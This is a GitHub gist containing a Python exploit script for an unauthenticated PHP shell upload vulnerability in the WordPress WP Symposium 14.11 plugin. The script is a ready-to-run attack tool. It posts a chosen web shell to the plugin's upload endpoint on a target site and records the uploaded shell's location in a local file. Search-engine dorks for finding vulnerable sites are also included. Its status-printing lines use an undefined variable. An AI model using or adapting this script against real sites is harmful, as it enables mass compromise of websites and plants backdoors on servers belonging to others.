Created
December 12, 2014 00:10
-
-
Save danilovazb/7fb7e2c16b5bd39401e1 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #------------------------------------------------------------------------------- | |
| # Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability | |
| # Vulnerability discovered by Claudio Viviani - http://www.homelab.it | |
| # Exploit written by Claudio Viviani / Edited INURL - BRASIL | |
| # 2014-11-27: Discovered vulnerability | |
| # 2014-12-01: Vendor Notification (Twitter) | |
| # 2014-12-02: Vendor Notification (Web Site) | |
| # 2014-12-04: Vendor Notification (E-mail) | |
| # 2014-12-11: No Response/Feedback | |
| # 2014-12-11: Published | |
| # DORK: index of "wp-symposium" | |
| # DORK: inurl:"plugins/wp-symposium" -site:wordpress.org | |
| # Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs | |
| #------------------------------------------------------------------------------- | |
| import urllib, urllib2, socket | |
| import sys | |
| import string, random | |
| import optparse | |
| import os, os.path, mimetypes | |
| from datetime import datetime | |
| def checkurl(url): | |
| if url[:8] != "https://" and url[:7] != "http://": | |
| print('[X] You must insert http:// or https:// procotol') | |
| sys.exit(1) | |
| else: | |
| return url | |
| def checkfile(file): | |
| if not os.path.isfile(file) and not os.access(file, os.R_OK): | |
| print '[X] '+file+' file is missing or not readable' | |
| sys.exit(1) | |
| else: | |
| return file | |
| # Get file's mimetype | |
| def get_content_type(filename): | |
| return mimetypes.guess_type(filename)[0] or 'application/octet-stream' | |
| def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): | |
| return ''.join(random.choice(chars) for _ in range(size)) | |
| # Create multipart header | |
| def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName): | |
| getfields = dict() | |
| getfields['uploader_uid'] = '1' | |
| getfields['uploader_dir'] = './'+randDirName | |
| getfields['uploader_url'] = url_symposium_upload | |
| payloadcontent = open(payloadname).read() | |
| LIMIT = '----------lImIt_of_THE_fIle_eW_$' | |
| CRLF = '\r\n' | |
| L = [] | |
| for (key, value) in getfields.items(): | |
| L.append('--' + LIMIT) | |
| L.append('Content-Disposition: form-data; name="%s"' % key) | |
| L.append('') | |
| L.append(value) | |
| L.append('--' + LIMIT) | |
| L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php")) | |
| L.append('Content-Type: %s' % get_content_type(payloadname)) | |
| L.append('') | |
| L.append(payloadcontent) | |
| L.append('--' + LIMIT + '--') | |
| L.append('') | |
| body = CRLF.join(L) | |
| return body | |
| banner = """ | |
| 0x[EXPLOIT NAME]: Sh311 Upl04d Vuln3r4b1l1ty Wp-Symposium v14.11 / INURL - BRASIL | |
| ------------------------------------------------------------------------------------------------------------------ | |
| """ | |
| commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]') | |
| commandList.add_option('-t', '--target', action="store", | |
| help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", | |
| ) | |
| commandList.add_option('-f', '--file', action="store", | |
| help="Insert file name, ex: shell.php", | |
| ) | |
| commandList.add_option('--timeout', action="store", default=10, type="int", | |
| help="[Timeout Value] - Default 10", | |
| ) | |
| options, remainder = commandList.parse_args() | |
| # Check args | |
| if not options.target or not options.file: | |
| print(banner) | |
| commandList.print_help() | |
| sys.exit(1) | |
| payloadname = checkfile(options.file) | |
| host = checkurl(options.target) | |
| timeout = options.timeout | |
| print(banner) | |
| socket.setdefaulttimeout(timeout) | |
| url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/' | |
| content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$' | |
| randDirName = id_generator() | |
| randShellName = id_generator() | |
| bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName) | |
| headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', | |
| 'content-type': content_type, | |
| 'content-length': str(len(bodyupload)) } | |
| try: | |
| req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers) | |
| response = urllib2.urlopen(req) | |
| read = response.read() | |
| if "error" in read or read == "0" or read == "": | |
| print("0x"+now.hour+":"+now.minute+":"+now.second +"[INFO][NOT VULN]: Upload Failed :(") | |
| else: | |
| print("0x"+now.hour+":"+now.minute+":"+now.second +"[INFO][VALUE]: Shell Uploaded") | |
| print("0x"+now.hour+":"+now.minute+":"+now.second +"[INFO][VALUE]: Location: "+url_symposium_upload+randDirName+randShellName+".php\n") | |
| arquivo = open('Sh311_Upl04d_Vuln3r4b1l1ty.txt', 'r') | |
| texto = arquivo.readlines() | |
| texto.append(url_symposium_upload+randDirName+randShellName+".php") | |
| arquivo = open('Sh311_Upl04d_Vuln3r4b1l1ty.txt', 'w') | |
| arquivo.writelines(texto) | |
| arquivo.close() | |
| except urllib2.HTTPError as e: | |
| print("0x"+now.hour+":"+now.minute+":"+now.second +"[INFO][ERROR]: "+str(e)) | |
| except urllib2.URLError as e: | |
| print("0x"+now.hour+":"+now.minute+":"+now.second +"[INFO][ERROR]: Connection Error: "+str(e)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment